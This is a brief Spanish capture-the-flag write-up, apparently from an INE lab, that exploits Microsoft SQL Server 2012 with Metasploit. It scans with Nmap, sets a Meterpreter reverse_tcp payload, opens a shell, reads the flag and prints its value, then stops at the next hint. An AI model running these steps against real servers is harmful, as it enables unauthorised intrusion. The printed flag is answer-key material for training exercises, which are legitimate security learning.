🧪 Flag 1: Explotando MSSQL Server

Objetivo: Acceder a la cuenta MSSQLSERVER.

  1. Iniciar servicios y Metasploit:
service postgresql start
msfconsole -q
  1. Verificar conexión de la base de datos:
db_status
  1. Escaneo con Nmap desde Metasploit:
db_nmap -p 1433 -sV target.ine.local -sC -O --osscan-guess

✔ Se encontró el servicio Microsoft SQL Server 2012 en el puerto 1433. (Medium)

  1. Seleccionar y configurar exploit:
search Microsoft SQL Server 2012
use 0
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS target.ine.local
run
  1. Meterpreter session exitosa.
  2. Acceder a shell y leer la bandera:
shell
cd \
dir
type flag1.txt

👉 Flag 1: c3f6a31554ec41f7beeb6f5260b2527b

✅ Capturada. (Medium)


🧪 Flag 2: Carpeta de Configuración de Windows

Hint: El siguiente flag está en el directorio de configuración de Windows.